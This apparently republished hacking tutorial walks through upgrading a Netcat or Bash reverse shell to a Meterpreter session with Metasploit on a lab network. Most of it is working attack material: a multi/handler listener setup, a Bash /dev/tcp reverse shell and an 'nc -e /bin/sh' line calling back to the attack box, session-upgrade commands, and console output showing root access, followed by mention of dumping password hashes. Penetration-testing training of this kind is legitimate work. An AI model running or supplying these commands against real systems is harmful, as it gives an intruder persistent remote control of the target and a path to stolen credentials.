In this hacking tutorial we are going to upgrade a Netcat shell to a Meterpreter shell in 3 simple steps. First we will use the multi handler module in Metasploit to intercept the reverse shell using a Linux x86 payload. Then we will issue the reverse shell on a Linux host with a Bash reverse shell. Finally we will use the post exploitation Metasploit module shell_to_meterpreter targeting the session with the reverse Bash shell.
Step 1: Setting up a Metasploit Multi Handler
Let’s fire up Metasploit and setup the multi handler to intercept a reverse Bash shell on port 443 with the following command:
msf > use multi/handler
msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.178.16
lhost => 192.168.178.16
msf exploit(multi/handler) > set lport 443
lport => 443
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.178.16:443
[*] Sending stage (36 bytes) to 192.168.178.32
[*] Command shell session 1 opened (192.168.178.16:443 -> 192.168.178.32:59438) at 2018-12-29 15:06:09 +0100
Step 2: Target host – Bash reverse shell
Now that we have got a listener running on port 443 we can issue the bash command on the target host to setup a reverse shell and connect back to the attack box. Please note that we are executing this command on the target host from the command line. In real life penetration testing scenario’s this command is often executed through remote code execution (RCE) exploits using various attack vectors.
root@target:~# bash -i> /dev/tcp/192.168.178.16/443 0>&1
nc [IP attackbox] 443 -e /bin/sh
msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.178.16:443 [*] Sending stage (36 bytes) to 192.168.178.32 [*] Command shell session 4 opened (192.168.178.16:443 -> 192.168.178.32:59466) at 2018-12-29 15:24:56 +0100 id uid=0(root) gid=0(root) groups=0(root)
Step 3: Upgrade to Meterpreter shell
Use Ctrl-Z to background the current session
This takes us back to the msfconsole command line. From this point we can upgrade the shell in 2 different ways:
- Use the sessions -u [session id]command.
- Use the post/multi/manage/shell_to_meterpreter to upgrade the shell.
Let’s have a look at both ways starting with a direct upgrade by running the following command after we’ve put the active session to the background:
sessions -u 4
Once the command stager has finished we can interact with the new session by running the following command:
sessions -i 5
in the msfconsole command line we have to select the post exploitation module shell_to_meterpreter with the following command:
msf post(multi/manage/shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection — —- —- ———– ———- 4 shell x86/linux 192.168.178.16:443 -> 192.168.178.32:59466 (192.168.178.32) msf post(multi/manage/shell_to_meterpreter) > set session 4 session => 4 msf post(multi/manage/shell_to_meterpreter) > run [*] Upgrading session ID: 4 [*] Starting exploit/multi/handler [*] Started reverse TCP handler on 192.168.178.16:4433 [*] Sending stage (53508 bytes) to 192.168.178.32 [*] Meterpreter session 5 opened (192.168.178.16:4433 -> 192.168.178.32:35950) at 2018-12-29 15:29:09 +0100 [*] Post module execution completed msf post(multi/manage/shell_to_meterpreter) > [*] Stopping exploit/multi/handler msf post(multi/manage/shell_to_meterpreter) > sessions -l Active sessions =============== Id Name Type Information Connection — —- —- ———– ———- 4 shell x86/linux 192.168.178.16:443 -> 192.168.178.32:59466 (192.168.178.32) 5 meterpreter python/linux root @ webmail.jaccostraathof.nl 192.168.178.16:4433 -> 192.168.178.32:35950 (192.168.178.32) msf post(multi/manage/shell_to_meterpreter) > sessions -i 5 [*] Starting interaction with 5... meterpreter >
On some occasions you might receive a permissions related error when running this exploit. In this tutorial we have a root shell with write access on the path the regular Bash reverse shell is pointing to. In order to successfully run this exploit the target sessions needs write access to its current location. Switching the directory to /tmp will often do the trick, otherwise you have to find another location to write the payload to.
At this point we have an active Meterpreter session with the target host. We are now able to use this session for port forwarding with portfwd, dump system hashes and run post exploitation Metasploit modules on either of the sessions. Many of local Metasploit modules take a session id instead of a rhost parameter, this is where you supply the session id from the Meterpreter shell.
Lessons learned
In this tutorial we have followed 3 steps to upgrade a regular Netcat or Bash reverse shell to a Meterpreter shell:
- Setup a multi handler listener to intercept the Bash reverse shell.
- Initiate the reverse shell from the target host to the attack box.
- Run the upgrade to Meterpreter shell module from Metasploit.
Reference : https://www.hackingtutorials.org/networking/upgrading-netcat-shells-to-meterpreter/